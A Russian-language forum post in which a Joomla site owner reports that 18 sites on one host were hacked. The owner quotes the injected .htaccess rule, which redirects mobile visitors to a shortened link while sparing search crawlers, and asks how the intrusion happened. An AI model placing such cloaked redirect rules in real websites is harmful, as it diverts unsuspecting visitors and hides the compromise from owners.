Собственно у меня пару дней назад на 18 сайтах на джомле и на одном хостинге кто то закачал левые папки  и в .htachess прописали какой то стремный ридирект.

<IfModule mod_rewrite.c>
RewriteEngine   on
RewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone)  [NC]
RewriteCond    %{HTTP_USER_AGENT}  !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)    [NC]
RewriteRule    (.*)    -----goo.gl/Xxqhj-----    [L,R=302]
</IfModule>
Это вроде бы ридирект при посещении с мобильных телефонов? Кто разбирается поясните подробней если можно

Собственно у меня вопрос, как могли меня взломать? FTP на хостинге было удалено, SSH я не пользовался, остается один вариант - через админку на хостинге?  И еще такой нубский вопрос, возможно ли было взломав один сайт пробраться на хостинг? Или взломав один сайт - можно только засрать это сайт, а не другие на одном хостинге?  (этот вопрос меня больше всего волнует) Не взломали же они 18 сайтов по порядку?
Судя по датам закачек левых папок - первый раз взломали 1 февраля заразив два сайта, а 17 февраля заразили остальные 16.
Теперь сижу и думаю не могли ли они еще чего нибудь мне на сайты напихать